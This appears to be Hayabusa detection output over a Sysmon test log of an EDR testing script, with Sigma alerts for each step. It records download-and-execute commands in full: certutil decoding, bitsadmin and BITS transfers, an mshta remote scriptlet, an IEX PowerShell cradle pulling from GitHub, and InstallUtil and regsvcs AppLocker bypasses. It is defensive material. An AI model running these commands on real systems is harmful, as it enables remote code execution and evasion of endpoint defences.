747F3D96-6607-5D3F-0000-0010B3818500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:57.633 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x413182 | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3184 | PGUID: 747F3D96-660A-5D3F-0000-0010B9E08500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.659 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil 
Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:58.711 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2576 | PGUID: 747F3D96-660A-5D3F-0000-001048E58500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: certutil -f -decode fi.b64 AllTheThings.dll | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c certutil -f -decode fi.b64 AllTheThings.dll | LID: 0x413182 | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.234 +09:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\AllTheThings.dll | Process: C:\Windows\system32\certutil.exe | PID: 700 | PGUID: 747F3D96-660A-5D3F-0000-0010FFF28500,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:32:59.582 +09:00,MSEDGEWIN10,11,medium,,Rename Common File to DLL 
File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.193 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6020 | PGUID: 747F3D96-660F-5D3F-0000-00109B328600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2948 | PGUID: 747F3D96-660F-5D3F-0000-001055378600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.254 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | 
Process: C:\Windows\System32\bitsadmin.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c bitsadmin.exe /transfer ""JobName"" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt ""C:\Windows\system32\Default_File_Path.ps1"" | LID: 0x413182 | PID: 3896 | PGUID: 747F3D96-660F-5D3F-0000-00100F4F8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.886 +09:00,MSEDGEWIN10,1,medium,Evas | Persis,Bitsadmin Download,,rules/sigma/process_creation/proc_creation_win_bitsadmin_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 | LID: 0x413182 | PID: 6720 | PGUID: 747F3D96-660F-5D3F-0000-00106B508600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in 
CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:03.966 +09:00,MSEDGEWIN10,1,high,Evas | Persis,Suspicious Bitsadmin Job via PowerShell,,rules/sigma/process_creation/proc_creation_win_powershell_bitsjob.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:04.008 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3756 | PGUID: 747F3D96-660F-5D3F-0000-00104D5B8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 108 | PGUID: 747F3D96-6614-5D3F-0000-001093CE8600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.202 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.318 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C 
""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 7156 | PGUID: 747F3D96-6614-5D3F-0000-00104ED38600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | LID: 0x413182 | PID: 5696 | PGUID: 747F3D96-6614-5D3F-0000-0010BFD98600,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:08.446 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Execution of InstallUtil Without Log,,rules/sigma/process_creation/proc_creation_win_susp_instalutil.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5116 | PGUID: 
747F3D96-6619-5D3F-0000-0010FDE78600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.214 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:13.225 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3224 | PGUID: 747F3D96-6619-5D3F-0000-0010BEE98600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 776 | PGUID: 747F3D96-661E-5D3F-0000-0010A3148700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.310 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6756 | PGUID: 
747F3D96-661E-5D3F-0000-00103F168700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | Process: C:\Windows\System32\mshta.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c mshta.exe javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:18.583 +09:00,MSEDGEWIN10,1,high,Evas,Mshta JavaScript Execution,,rules/sigma/process_creation/proc_creation_win_mshta_javascript.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.186 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: mshta.exe 
javascript:a=GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct"").Exec();close(); | LID: 0x413182 | PID: 404 | PGUID: 747F3D96-6620-5D3F-0000-0010C7798700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49826 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:20.711 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49827 (MSEDGEWIN10.home) | Dst: 93.184.220.29:80 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\mshta.exe | PID: 3164 | PGUID: 747F3D96-661E-5D3F-0000-00107F248700,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:21.567 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1356 | PGUID: 747F3D96-6621-5D3F-0000-001071D28700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c powershell -c ""(New-Object 
Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5816 | PGUID: 747F3D96-6623-5D3F-0000-001011F68700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.215 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.232 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6156 | PGUID: 747F3D96-6623-5D3F-0000-0010CBF78700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c powershell -c ""(New-Object 
Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_specific_comb_methods.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:23.507 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious XOR Encoded PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_xor_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.104 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Default_File_Path.ps1 | Process: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:24.563 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell -c ""(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))"" | LID: 0x413182 | PID: 1176 | PGUID: 747F3D96-6624-5D3F-0000-0010E8358800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49828 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 3000 | PGUID: 747F3D96-6623-5D3F-0000-0010BC068800,rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:25.202 +09:00,MSEDGEWIN10,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C 
""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1296 | PGUID: 747F3D96-6628-5D3F-0000-001067768800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.250 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 2040 | PGUID: 747F3D96-6628-5D3F-0000-001062788800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:28.374 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe AllTheThings.dll | LID: 0x413182 | PID: 4860 | PGUID: 747F3D96-6628-5D3F-0000-00105B918800,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.341 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 
Bypass,,rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5708 | PGUID: 747F3D96-6628-5D3F-0000-0010B1968800",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx +2019-07-30 06:33:29.565 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker 